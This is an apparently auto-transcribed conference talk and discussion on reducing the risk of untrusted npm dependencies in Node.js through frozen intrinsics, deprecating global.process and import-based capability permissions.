 Right, so this session's on security modules and Node.js and I want to just give a brief introduction to the topic. Can you all hear me okay? Is that alright? To the back? Good. Brief introduction and then hopefully a discussion. If people are interested, have thoughts. If we've got any security experts here, please poke holes in what we're suggesting are ideal. Yeah, so what this is, if you don't know me, my name is Guy Bedford and I've been involved quite a bit in the modules working group. I should probably set up the Zoom chat so we can actually get participants. Sorry, do you know what the meeting is for this? Yeah. 381? 381? 381? 381? 381? 36? 36? 3642. 3642, yep. Certainly planning everyone's... Do not connect. Do not connect ideal because audio is coming from here. Yeah, otherwise you will feed back. There you go, yeah. Great, okay. So we should be live. All right. Can you share your screen to the Zoom in the center? Yeah. Sure. Got it. OK, great. Yeah, good. So for those of us who are just joining us online, I was just saying that working on the integration of ES modules in Node.js has quite a few touch points with the security of Node.js. So as we shift the ES modules and all the decisions we're making around ES modules are affecting the security of Node.js in the future. And the other thing is that WebAssembly has its own security models, which, as we integrate WebAssembly into Node, also affects Node.js. So Node.js is surrounded by a lot of interesting things going on at the moment. And in particular, security is a huge area. There is so much that can be discussed. The problem that I'm focusing on here is very specifically the problem of running untrusted code from Node modules and thinking about that. And if there are things that we can do about that. And this is all very, very much long-term thinking. So I'm not suggesting changing Node today, I'm suggesting just thinking about the longer term of the project and the longer term security positioning of the project. And if there's small tweaks we can do today and think about today to sort of plan for the future. In particular, I have a PR up. And this is actually what started the motivation for the session was a pull request to remove global doc process, which is currently available in all modules, but just for ES modules. And currently, Mateo is the block on that. So this entire session is to give Mateo to push that here. Thank you, Mateo. The inspiration here is almost entirely from the SCS project, Secure Ethnoscope project. And this is the problem of maybe tackling running secure third party JavaScript without security risks. So everything I'm talking about, you can basically get exactly the same things from this talk that Mark Miller gave to TC39 called Extremely Modular Distributed JavaScript. And I would strongly recommend taking down that YouTube link and watching it because it's a very interesting talk about this topic. And one of the key insights there is that JavaScript is very, very close to having some very, very strong security properties. It has no security properties right now, but it's very close to having some incredibly strong security properties. And so there are some ways we can maybe nudge it in those directions. And the other thing about it is Mark Miller mentions it as being surprising in comparison to other languages that you'd consider maybe technically superior. So this is the example of what we're looking at, the type of attacks that are possible. This was an example earlier in the year where you've got a deep dependency of a dependency of a dependency of a widely installed package that maybe isn't maintained that well. Someone ends up maintaining it or getting the rights to publish for that package. And in this case, it was to get cookies packaged and they were able to publish a backdoor into the node modules. And then anyone who's running upgrades of their dependencies without a lock file is potentially getting this backdoor. And because it was a cookie processor, it could actually take commands that would allow remote executions and things like that. So you've gone from not knowing that you were using this package and this person had access to your application, to them having full read access and being able to have full control and the ability to do anything they want. And this is the model for a security talk. It's like scare people about the problems and then dive into the solutions. Right, so the threat scenario is you have all these maintainers you depend on at any given time. Someone could get access to one of them, push out a patch. You had stole the patch without knowing it. And now you've been compromised. And because of the security model of Node.js is so permissive, any package can do anything. That cookie parser has full read access to the file system. So the maintainer of that cookie parser can push up code. And then what happens is when this gets discovered we have the security process that kicks in and we've made incredible strides in getting to a position where security audits are now completely widespread. And that's amazing how that process has been built. It means that there's a very, very short window before your vulnerability gets discovered. But the problem with security auditing is it can only deal with security vulnerabilities that are known about. And there is still that case where what about the sort of maintainer that's been compromised? And there's that small window of time where they're able to push up a damaging code. And there's nothing you can really do about that. And we're especially vulnerable because in the Node.js ecosystem we depend on a lot of maintainers and it's not going away. It's growing over time. We might have third party code we're using and we update incredibly fast as well. And with tools like Dependabox you're updating patches all the time. And that's great because on the other hand you're patching vulnerabilities that are being discovered. But it also means it's very easy to very quickly have one of those maintainers you don't even know about having been following for them to just push up something that's malicious for it to propagate very fast before it's eventually caught and mitigated. So it's this kind of... It's this Node modules time bomb of all of these vulnerabilities out there. So I'll try and stop parking it into it as well now. But the idea is can we not somehow restrict those permissions so that it's not as bad as it is? There is install script as well that you're not using in here. Thank you. That makes things 100 times worse as well. Yes, that was... Yes. So we should stop install scripts and we should just run install scripts that need to build binaries and can do it in ways that don't... Yeah, okay. Sorry, I just want to... No, no, it's worse than I've been saying. If you try and speak to anyone about securing JavaScript or securing JavaScript as it works today they'll very quickly... The general assumption is that's just not possible because that's not how JavaScript works. The language has too many security holes and we can't patch them. And the only security model for JavaScript is per-process isolation, per-process sandboxing. That's what the browser does. That's what the V8 Chrome engines do and that's the only security model. And to try and fix individual things like that PR that I've got up to remove the global dot process you just... One small leak of a huge problem. So don't even bother. And that's before you even get into all this meltdown specter stuff where we have these CPU hacks where even if you plug all those same-process issues it's still possible for there to be same-process vulnerabilities in the CPU itself. So once we solve the language we've still got the problems of the CPU architectures. So the counter-counter argument is Node.js is not a browser. We shouldn't take our security advice from the browser environments. Node.js has very different security properties and it's really not an option for us in Node.js to adopt sandboxing with Node.js. The way that we've written our code sharing in the language if we just sort of bolt on some kind of sandboxing around that it's gonna break a lot of features and the way that things already behave is they're expected to be able to share the same bindings and the same functional instances. So it's not necessarily we can just add on. So then the question is, well, are we just left with security auditing? And we kind of have this process where we know that any malicious maintainer could come in or socially engineer their way into a project or steal the private keys of a maintainer. And when that happens it's just kind of a process where we all have to very quickly respond to that and that's just the way things are. And we just sort of accept this kind of sacrifice every now and then that a few people are gonna get hacked from time to time and that's just the way things are. And so the response to those arguments about trying to get perfect security is what can we do to mitigate those risks? So to reduce those risks, not perfectly solve them, not create an ecosystem where everything is perfectly secure, but what can we do to make sure that as much as possible we reduce that risk, which right now is quite high because any of the hundreds of maintainers that have access to my app can get full read access so it's not a black and white issue. There will always be an attack surface that minimum you can be hacked. So if you think of this critical attack probability as something like how many maintainers have published access to your upgrade cards times the average security standards of those maintainers. So do they use two factor authentication are susceptible are they to a spoofing or other types of hacking attacks? Ideally, MPM by default would use 2FA and I don't know if it's what it really does but that's that's it would be a huge one to reduce this overall probability. And then the third thing that factors into this probability with it. One thing that you might want to reach to MPM and I don't know if that quality attack is as part of the install data from the registry gives us the information that that published as 2FA enabled and that is that's probably valuable in this context. Sorry, I can move my head. Oh, that's a very good point that you could have some kind of like upgrade double-dash secure. So essentially you can check what can be your attack points. Essentially it's not a solution but at least you know you have data to measure that and right now we don't. So you can say I only want to get patch updates from Yeah, or none or none or none, zero. Yeah. I want to manually update that. That's the great thing. And check. Because that way you can drive the 2FA adoption as a user as opposed to expecting it to be some kind of global thing that can be more subtle maintained. Yeah. Okay, that's a great point. Yeah, and then the third factor that comes into this attack probability is if that maintain it does get hacked and we know that they're able to upgrade our packages, how capable those maintainers, even if they wanted to get access to our systems. And at the moment that's one. So any maintainer gets full access. The question is can we possibly think of a way or an ecosystem in future where we could reduce that down so that it's averages less than one. And that's what we can mitigate. So if we can just start reducing our capability of the time and reduce the commissions that we give, we could possibly start to mitigate this overall probability. Well, also, and then the other thing is we don't want to just reduce this probability by reducing the number of maintainers our actual item. We don't want to retreat into some kind of lead item where we think now we open sources and secure we're just going to rely on our own company code or something like that. We want to encourage these healthy ecosystems where we can safely share code. And so if we can focus on these other two, then we can compensate for the security risk. So I'm just going to take a step back and speak about the security model a little bit in WebAssembly. Here's an example of running WebAssembly through ES modules in Node.js today. That main should probably be a main Node.MJS or I could have a package.js on with a type module in the local folder. And in this example, I'm loading say a JavaScript parser that's in a third party module that I've installed and I'm loading it from a Weizen file. So I'm loading its memory, which is just offer and at the parse function. And at the bottom there, I am running the parser, so I'm writing a string into the buffer and then parsing it and getting a point into the data structure and memory of something. It's a very rudimentary and bad example, just showing the sort of minimum WebAssembly interfaces we have today. But what this demonstrates is the security model where we could have, for example, and it's the two factors of the security model. So the one thing is having information be compromised to say for example, we've got some information we don't want that third party modules to be able to discover the highly coveted shrug emoji. And then we also have a function here that we don't want to be run by our third party module. So this function represents the capability that the nuclear launch function where you don't want the third party codes to be able to call that function. So do we know that we can safely load this third party code, this third party WebAssembly code without either exposing the secrets or exposing the ability to call these protected functions? Here's what might be inside that WebAssembly module. It defines its memory, it defines its parse function and then it exports them. And the amazing thing about WebAssembly is if we know that that module has no imports. So if we know for a fact that this WebAssembly module itself isn't able to import anything else from our file system, or the module system, then we don't care what code is in this parsing function. It could be downloaded from the like, dodgiest side of the internet. It doesn't matter what's in that function because it won't be able to get access to secret information or the function capabilities we have in our other module. And so WebAssembly is a secure sandbox down to the imports it is given. And if we can control which imports are available, then we can run unknown third party WebAssembly code on the same process with zero risk. And even with Meltdown Inspector, we don't have that problem either because Meltdown Inspector are timing attacks. They need access to timers in the environment. And in this code example, the WebAssembly code has no access to a timer. It can't access any timing functions. So it can't do any reverse engineering of the CPU cache to try and discover sensitive information. So this is also a demonstration of parallel. So the module only has as much access as it needs to do its job. And AST parser doesn't need root access to the file system. Yeah, I don't know anything about WebAssembly. Do you say WebAssembly doesn't have access to JavaScript buttons like object? So yeah, it doesn't have any global object like JavaScript does. So it won't have access to access anything like that. So it can't construct an object and access the dot prototype and looking at it. Exactly. Unlike every other programming language that anybody here has probably used much. And that's exactly the next thing I'm gonna get to. So what about JavaScript? Well, JavaScript has all of these exact same security properties that WebAssembly has. And this is what we mean when we say it's very close to having these strong security, security, lost the word, properties. So except for four things. One, we have global capabilities. We have global dark process. If we implement fetch like the browser does, we have global dot fetch. We have a mutable global and mutable intrinsic so you can override object prototype. You can add things to the global, you can read sense of information of the global. We have access to timers and we have unrestricted access to inputs. So I'm just gonna go through these in a little bit more detail. Global capabilities of process, you can have a whole bunch of sense to the informational process. Processed on environments, probably gonna have some security tokens on it. You can read the standard in. So these are all things that can contain sense to private information that you don't want leaking out. And if we have a global fetch, well, so in this example, I've got like a JavaScript parser and then underneath it can just have a whole bunch of code that steals secrets of the process environments. It can take all of those from the globals. And if we have a fetch global, it'll be able to share those secrets with the third party server. And this is one of the arguments for why we probably don't want a fetch global in Node.js. And I would argue strongly against a fetch global in Node.js is because it makes this global capability available to all third party packages, which if we don't have, then those packages don't have the ability to share these secrets anymore. We've also got deal open. You can open any node native binary to get full access to native interfaces. And we've got process.hr time, which is ideal for doing the meltdown specs that have timing attacks because you don't even have to construct a timer anymore to do those attacks. You've got this perfect CPU timer that you can use to detect when it's optimizing. The other thing is that these mutable globals and mutable intrinsics, you could have a third party package that overrides JSON that Stringify and now you're using Stringify on your app and it's behaving the same. But in the meantime, it could be stealing all that information that's running through JSON that Stringify. So, and then sending it off to a third party server. Objects are too stringing. Prototypes are too stringing to be ever written to do the same thing. It has this binding. So you've suddenly exposed just by calling too string on an object without realizing it. You've exposed that object itself to some third party code. And so these traps in JavaScript allow third party code to intercept objects that you thought were only within your own application code. And here's another example of ways in which you can inject into intrinsics. And this one's a little bit more convoluted, but say for example, you have a walk function that has objects of two types. And it's either in type A or it's type B and the one type has a children property and the other type doesn't. And you check which type you've got by checking if you can do that property access and if it returns undefined. But that property access to extra children is gonna go all the way down the prototype chain of objects. So if some malicious code had defined children on the object prototype, it's gotta get a trap and it can also steal that object. And in this example, the classes, these are not just objects, they're classes and you could have potentially functions or capabilities on these objects as well that are being made available. So it's, these are the ways in which we're spilling these security properties. Any questions on that? Mr. So there are overall on the context of the globals, okay? And intrinsics, sorry, and primordials which you haven't talked too much yet but it's probably relevant. So the way you're tracking primordial primordials in node, it introduces some performance over it and accessing globals is faster than not accessing globals to some extent and doing a level of production overall on accessing those things like that's my main blocker on your PR is performance, right? So I just want to flag that it's not just about security. It's also about, there are also other crossover schools so it's a very... Can you clarify what your performance concern is? So I've been recently doing some work on event meter and event meter, if you don't know the internals it uses reflect dot apply and we get that reflect dot apply from our primordials, blah, blah, blah then reflect object. However, accessing that object through reflect dot apply as we are doing and moving it instead of doing const apply it was reflect dot apply in the file and then just using that instead gives us an 80% performance improvement on our micro-visuals. So, yeah, sorry, I'll just... So I'm just flagging it as a theme. But how does that relate to this? It relates because you have, you know the problem with the globals and the way you're doing the global stuff. The way you want to... You're referring to the PR and the technical use in that? Yeah, yeah, yeah. So what I'm referring is on the... If granting security on those type of global things needs to not have an impact on the performance of an object and this is the two different direction. So to be very clear, global dot process is it's... There is nothing else that I'm proposing changing and that behavior of global dot process does cause... So that I've kind of created a PR and saying, well, these globals, it's this example where we've got all these things on process in the global scope. And I'm saying we should deprecate process so we can allow this not to be possible anymore for people to read authentication tokens or process environments in any JavaScript environment but we're only deprecating process in ES modules and the way that I constructed that deprecation was to kind of have a getter for process on the global object and you're saying that getter itself is a performance degradation for common JS and we also need to bear that in mind. Right, yeah. That is my... So I just wanted to flag it is not just about security okay, there is... There are different level of concerns and cross-cutting concerns here. So we go back to that conversation again. The other thing I want to say on the fetch thing, yes, please, that thing that has a global aspect, it's a very good thing. Back to the fetch session later that we talked about. Well, it's actually now. Okay. We've got 25 minutes. Can we? Yeah, this is an hour. Okay, right. I'm sorry. Thank you very much. I misread the schedule. You have lots of time. Never mind. Yeah, you're making me panic there. Right. So what we've got now to mitigate these problems of the globals and the intrinsics is we have a frozen intrinsics flag that landed in node 11.12. And what this does is it goes through all these objects like JSON, object, object.prototype. Actually, none of these. So maybe the intrinsics that are available, anything that's on the global object normally, and it freezes it so that you can't do, if you try to do any of these lines of code in strict mode, you'll get an error if you try to override these defaults. And what we're doing is we're seeing if those who are interested in exploring these security properties and want to see if they can enable modular permissions. This is absolutely critical to that, but it's opt-in. So we're not changing the default experience in node. You can opt into it. And then third-party packages will likely hit cases with their bugs where it runs up against this flag. And that's where we want to get feedback on and see how people are using this and potentially get ecosystem PRs that fix up any cases where it breaks. Or if there are problems integrating this change of behavior, which is quite a big change of behavior. So you think back in the day, we had things like the prototype library that was entirely built off the concept of overriding native prototypes in the browser. It's quite a big change to think on these things as person. But this is critical to getting security properties in JavaScript if we wanted. And let's see how far we can get in executing node modules under this flag. And if anyone is using this or interested in exploring it further, please do chat to me or anyone else involved in this work. The code cases there are scenarios where setting two string on objects that don't happen to begin with. And these are sort of the subtle bugs that that can happen and then the cases we need to announce when it happens. On the one hand, it's regarded as a spec bug that you can't define any of the object methods on an object that has a frozen object prototype and you need to make sure they're defined upfront. But these are the sort of bugs that you hit. But hopefully they're fairly minor because the object doesn't have many properties on its prototype. The third thing is timers. And unfortunately, we can never deprecate date.now in JavaScript. In Node.js, it's pretty far integrated into the ecosystem. Maybe we could make some progress on that. But we just have to accept that we have access to timers, which means we have meltdown inspector attacks. And so we just have to assume that it will be possible for the sort of reverse engineering attacks, some of the CPUs take place and sensitive information in the same process can be read. So if you've got a token, a secure token or secure information or organizational information that's running in the same application, just like the WebAssembly example that I showed at the beginning, if you're in JavaScript, you have to assume that there exists an attack that'll be able to discover that information in a module running in the same process. And even though there are hardware mitigations coming through for these attacks, they're a class of attack. And I don't think we can consider them solved in any way, shape or form yet. Please update me if anyone knows more. Yes. Yes, if you're on separate processes, I mean, I'm sure there's a... To be honest, I don't know if they do extend to those attacks. I mean... Till? They don't. We trust browser security teams, I guess. And they tell us that it's safe to have different processes so we can... If you wrote something in C, would you be able to get the context of your JavaScript process? Of a different JavaScript process? Yeah. Okay. I was going to ask about workers. Can it be fixed in the terms of workers? It wouldn't change how the ecosystem works now. If work is a running in the same process, then it will say it's acceptable to attack. Really? And we are not considering... Modular permissions for workers if they turn on time or something like that. Well, as you mentioned, you cannot in the case of date.now, you cannot do that. Yeah, maybe we could add a flag to know to disable date.now, but I'm not optimistic about that working in the ecosystem. I just think it'll break too much. Already this frozen entrance is a tough one and it'll take a lot of collective effort to be able to support the ecosystem and PR the ecosystem to support it. Date.now is even more drastic. But yeah, in workers, I'll talk about that. That's one of the reasons why I want to separate level dot process because they need to have HR time. It's harder to construct a high resolution timer with date.now, but I believe it is possible. There are various subtle techniques. But yeah, process.hrtime that's not what we need for that. You can't see work to try to build time at time this. So, but the key thing I want to mention here is just because you can discover a secret doesn't mean you're sterling it. So to complete the act of stealing a secret means being able to propagate that information to another server. So you need to have the timer capabilities, which maybe let's give up on, but then you also need to have the capability to share that secret. So even if you're running code on the same process that in theory could be discovering or your internal authentication codes and things, it's only can be considered insecure if it also then is able to share that information with a third party. If that code is in a sandbox where it doesn't have the ability to escape the sandbox, then it can't share the secret. So was the secret really happening is the point. So this is the capability to exfiltrate. And if we move the focus for JavaScript from the capability for timers and accept we've lost that war and rather just move it to the focusing on the capabilities for exfiltration, then that that could be a way that we still maintain the strong security models of making sure that secrets go out in sterling. So this means protecting your side channels. So things like HTTP, fetch any other ability to touch the network to get access to any way that you're getting out of that sandbox. And we need to think about that capability in terms of permission that we're managing. Yes. I'm sorry. Sorry, you were waiting a while there. No worries. So I just spent time with the comics and sharing buffers just writing spec tests. And I learned about this concept during that which I had like zero exposure to called the monotonic time. And, you know, fascinating, but I was just curious if so we were able to kind of expose like our run to the like our test execution runtime kind of post to use monotonic time to kind of like verify that like, you know, things happen exactly when we expected it to happen. And so I was just curious if there was any way to expose that lower level primitive to kind of get around the data. To get around issues. The date dot now. Right. So, yeah, so that's the third way to construct a timer is with shared memory. You can kind of have something that runs in a separate thread. It's always incrementing a single memory location. And you can sort of format a timing mechanism. So access to shared memory in WebAssembly and JavaScript should be regarded a timer mechanism. Ideally, for WebAssembly, if we want to be able to be secure for not allowing those kind of secret attacks, we would want to restrict access to shared memory and then treat it as a permission because we don't have that time problem in WebAssembly like we do in JavaScript. But in JavaScript, because we have time, it's there. Unless we can get rid of date dot now, that's it really. So the fact that there might be ways to share memory to construct timers is yeah, it could be another way of getting time out of it. So, sure. There are many sources of time. Yes, James. So one of the things that I started to look at was simply with workers. Right now they spin them out, they're given a full copy of the environment. They have access to process and everything else. I'm looking at the lightweight worker that doesn't have that. If they can only run the code that it's given at the start, it won't have access to require or won't have access to. Here's a bunch of code to write. So hopefully, looking at it, it won't solve the date dot now issue or the access to the shared memory, but hopefully it will give a little bit of a better look at the data. I'm most very hopeful for module workers when we get to that to be based on a similar model. So, yeah, we need to have a secure concept of this capability to extract a secret, to send it back off to a malicious server or something like that. As long as we can control that access, we can control the secret information now. And then the thing you watch out for is what's called covert side channels. So side channels that we didn't even know we were doing. So say, for example, you're rendering some HTML and your HTML renderer gets hacked and now it's spitting out secret information for the hacker in invisible HTML or something. It's a side channel that you didn't intend to exist. But these are the sort of things that we will still rely on security audits for, but the difference with covert side channels is where they're not expected to be they can typically be marked as security bugs. There's still going to be vulnerabilities. I'm not saying anything curious. But if we think so the first thing is the ways that you get bindings in a module is you've got the global, we've got the intrinsics, we've got the timers and then the way that you access the outside world at this point is through imports. So if you think of imports as a kind of capability when you import read file from FS you're asking for the ability to read files. As a capability you're asking for the permission to read files. And actually at the resolver level we can have a security model because you could just throw on importing from FS and say no, you're not allowed to import FS. So if we treat imports in JavaScript as capabilities then we're getting something similar to that Wasm security model where we've now turned modules individually into secure sandboxes and we can control the network capabilities. We know that SecretsCon, Organizational SecretsCon, even if those packages and modules are completely hacked they won't necessarily have access to these things. So I want to briefly just go through very briefly the Dino and why is these security models in Dino it does something like this you run a server and as soon as you run that server you get a question that says this app is requesting network access. Do you want to grant it? You've got a few options and only once you accept that is the server, has it touched the server and then later on it requests read access to a file and you have to grant that read access as well. My concern with that is it assumes that the user is around to interact with the process and what if they're not is your server just running hanging all time so I'm not so sure about that there is another way to grant these permissions on startup through flags which seems better but again this is whole application permissions so that's great if you're running an application that you know is just going to take in text and spit out text but as soon as you've got any interesting application it's probably going to have a lot of permissions and then you've got that third party code problem that any third party code is going to have the same permissions so in this example if you're running third party code it also has the ability to talk to that server. Wazzy has a really interesting capabilities model where when you run the process you have to specify explicitly which directories are given access and once those directories are given access the idea is that you have these special references that represent those directories in this example the pwid underscore fd and temp underscore fd which I think the ultimate goal is to treat them like references so in JavaScript you could think of them like symbols that ideally wouldn't be forgeable I think right now they actually are forgeable but I think the plan is for them not to be for example when you load a file you say here's my special symbol for this folder, the temp folder that I got access to and the only way you can get access to that symbol well symbols you can only get access to if you're given the symbol so if you don't have the symbol you don't have access so you can't just forge a string and make it up you have to get access to that symbol and then you have access to load relative to that folder so it's really nice because it's this model by binding if you've got access to the binding or someone else has given you access to the binding it's the folder and these are unique forgeable references so the the principles are as I said I'm not at all suggesting changing the default experience in Node.js not suggesting that we change the way we do things today not suggesting that Node.js overnight implements a capabilities based security model rather the question is we have Node.js as a project it is the steering force of JavaScript that does not run in the browser and JavaScript in the browser for that matter can we use our power to try and steer this ecosystem in a beneficial direction and for those companies, for those organizations that are interested in getting these security properties which a lot of companies are interested in what can we do as a project to help start to move in those directions that they can potentially wrap or instead of having to say Node is not secure, we're going to go and do our own project like save for something what can we do to try and provide the properties through Node itself and unlock that work allow that work to happen on top of Node not get right into core but just on top in user land and just unlock it well we can already do import permissions through loaders loaders give the ability to hook the resolver which means you can provide a custom FS instance for every module every package can get its own FS with its own script permissions or we could do something like WASI's capability where you're passing in but that's a bit more drastic but the idea is you could wrap these APIs up through a loader in user land and you would be able to get these import based security properties that can restrict permissions and this package only has permission to the network but it doesn't have permissions to the file system and it doesn't get FS and you could just restrict it and this is a huge wide open space to explore but if we can start exploring it in user land I think it would be very interesting to see where things can go here's a sort of a complete bike shed or some ideas again this is literally just like jotting down notes and it's terrible but if you can control the imports of a package so you say the local project can only import FS and some third-party package it only has read access to the current folder and a third-party package is not permitted any imports and you could probably restrict imports by just saying packages are only allowed to import what they explicitly declare as dependencies in their package JSON so there's a whole lot of problems to think about this stuff but I think it would be worthwhile for us too to think about new work that can build in user land that types this stuff if they have a place where all those ideas are really written down so people can control it I don't think so do you know a place where they are? no, I'm not sure I've seen that a few people have suggested things like this so I think someone suggested a package or a schema for this kind of stuff but I'm hoping that we can get places together where we can discuss it because it's now is the time to be experimenting so that we can start to grow these models out given that we already have the loader argument there could be an easy open source project that implements all these ideas on the user land so the idea is restrict only imports to maybe what's in the dependencies of the package JSON so you treat the package JSON dependencies as a lay word I only import these packages and then maybe think about what core permissions you have and then I was thinking package management time so as you install a package you verify the permissions then as opposed to during runtime like Dino where you could say I can see what these packages are depending on the policy file that's treated like a lock file where you sort of know what each package is accessing so that if it tries to change its security policy on an upgrade path then you can be prompted for it on install and then re-prompt again there's huge usability spaces here lots of space to make horrible complicated things that are paid to use but that's why it should be that's why we should be exploring and prototyping and seeing what ideas we can come up with in these spaces again maybe install time is not the right time but I kind of like the idea of install time permissions I don't know but we should be having these discussions so to summarize if we can deprecate Matteo global.process and do not implement further global capabilities then you in your company want security and you can execute under frozen global if we accept that we've lost the war on timers and just allow people to and just focus on the ability to not get spritz out and assume that people are going to be able to use multi-aspect to discover them then we can play around with import and permission models on top of that and that gives us a comprehensive watch on security so that's a complete picture that's plugging all the leaks and please if you can see another leak let me know but coming from the direction that agraria could work that is the complete picture of modular security so that's what I mean by being very close to these strong security practices because you can't access anything else outside the module and then you get package security models so just as an example of what's meant so how does this mitigate the modular security well if you think right now we have this every dependency in your app has full access to everything then we can potentially get a model where those permissions are reduced and in this example the first dependency only has access to fetch which means yes it could possibly steal organizational secrets if it is hacked or any maintainer that dependency is hacked depth 2 no longer has any permissions because it's just like parser and it doesn't need to access anything so I don't care if it's hacked if it gets hacked it can't damage my server it can't damage my company depth 3 only has access to read from the local the local folder so if it gets hacked yes it can read sensitive information but it doesn't have network access or site terminal access so it can't exfiltrate those secrets so I don't actually care if depth 3 gets hacked if depth 4 gets hacked it's got access to fetch and the read so that is a worry one because it can share organizational secrets and depth 5 has write access so that can probably become a full boot in a full backdoor situation but we've gone from having five dependencies that immediately get read access if they were hacked to just having one dependency that leads to read access and two dependencies that leads to the possible loss of sensitive information and that's the idea of a reduced attack surface and mitigating that risk because we've reduced the risk and it's a lot of work to get a small improvement but the idea is if we can have lots of dependencies looking like dependencies 2, dependencies 3 there then we can get a very secure application model and to reiterate what I said from the beginning which is this is not about adding these kind of features today it's about saying let's enable these things and then experiment in userline and see if we can go without having to say if you want to secure JavaScript you've got to fork the ecosystem you've got to fork the project let's experiment on top of load to do these things and work towards it in a long term future this is very much many years as opposed to being something that happens so no longer is every package a target you've only got a few packages that have high permissions and the hope is as well that those maintainers know that it's so they can be more careful and know that they have a very privileged position yes, was it? I have possibly another thanks, go for it no, that's it I'll just do my last slide let's skip the discussion okay was it another type of attack? Rohan no no it's non-sharable I'm just flagging it okay there is my concern here my concern here is first of all I agree on all what you said okay mine is the fact that if removing we cannot afford at this point in time to reduce the throughput of node in any form and unfortunately global process sits on several very very hot paths in both node core and on applications via process.nextink we're talking about a do you remember what the numbers were? yeah I don't remember this was on a micro benchmark that was just doing process access that did slow down by maybe I think a few percent still, it sits that micro benchmark is there because that is the hottest that process.nextink is used everywhere and it's that it's kind of the problem it's that's I'm flagging it can we come back around and finish my last slide first? thank you so as I say this is a space where in the JavaScript space we're either going to have to rely on other server-side JavaScript project spearheading work here or because the browser wouldn't take the first step and Node.js has an opportunity here to lead the ecosystem and without fragmenting the ecosystem and slowly add on security potentially and as I say we've got frozen intrinsics we just need to follow through with some kind of frozen global idea and then deprecate global.process and that is it that's all I'm asking so Mateo's argument is exactly everything I'm talking about and if anyone wants to hack on loaders that do permissions I'd be very happy to chat so then anything else you want to talk about but Mateo maybe you want to uh so accessing frozen objects it is still a significant performance it on the 80 node so in order for this model to be successful accessing frozen objects should not have any performance cost and at this point in time it's pretty drastic if it improved but it's still there and it's you the model where I want to reach it's not security should not be at heart or should have a minimum impact on override on the actual process on the actual process so these are the same flags I'm not suggesting making it the default the frozen intrinsic is an option so if you want to I know that but it's just that the impact is we need to make it viable for companies to make those defaults sorry access performance for frozen objects are just being to work on that's great information that is thank you this is where we have these discussions this is this is something that you know that is needed and just like you that is needed it's not just that piece accessing frozen objects let's discuss the performance of the leveled up process at one but I hope that this talk has given you something to think about in terms of the security model that we could enable people to build on top of the node and I think it's that point that we're so close to it and if we just do this one thing we can open that door to in 10 years time having a project that is permissive and has all these nice properties and it would be very cool if that was a node and not another project I totally agree with you minus the fact that that's a very hard path it's not necessarily what we want to use we'll discuss it from there does anyone else want to ask any questions about these models or who do you think is that Michael just wondering like the one you're talking about the deprecation of process can you make that opt in as well like if there's an overhead so what we're targeting here is we want users who are writing in their JS not to assume that the global process is available so what we're doing is we're making it available we're making it a getter that gives you a warning that says please don't use the global dot process now if we do anything less than that people will use it they will publish it to MPM and it will be so ingrained we'll never be able to change it and this is why browsers can't adapt to any type of security models like this because they have all these globals and these things that cannot be deprecated and we have an opportunity to switch to ECMAScript modules where we can specifically deprecate the global dot process which is the only thing we need to remove to get to that kind of space but let's continue this discussion further, Jan yeah quick question about the concern by Martio that this is a super hot tech super hot tech super hot path because of Leicester which also brings me to should next-tick be the same kind of capability as having access to the process object in other words does this mean that we should as soon as possible introduce an alternative API to get next-tick presumably also one that is not as confusing you name this next-tick which actually does not give you a callback for the next-tick right so you say treated as a separate API or something and then if we deprecated that then we deprecate that path or something I feel like we do need to move fast because we're hoping to unplug ES modules at some point and we shouldn't assume we can suddenly change core APIs but there's no reason we couldn't consider something like that over the longer term I guess I'm on board like you know it's it's just a matter of pushing the change into the ecosystem and stuff like that but it's definitely possible it's just a matter of deciding as I said I'm not against deprecation of process I am concerned of where that is being used so and the next-tick part so that's not that's slightly different so as I said I'm against a little bit that of solution to some extent not the actual end result I forgot to ask some questions from online I don't know if we have any let's just see if we've got any questions in the chat nope yeah I don't see any questions there so we'll call it there and thanks everyone please chat further with any of us from the modules group or myself without this work if you're interested in discussing it thank you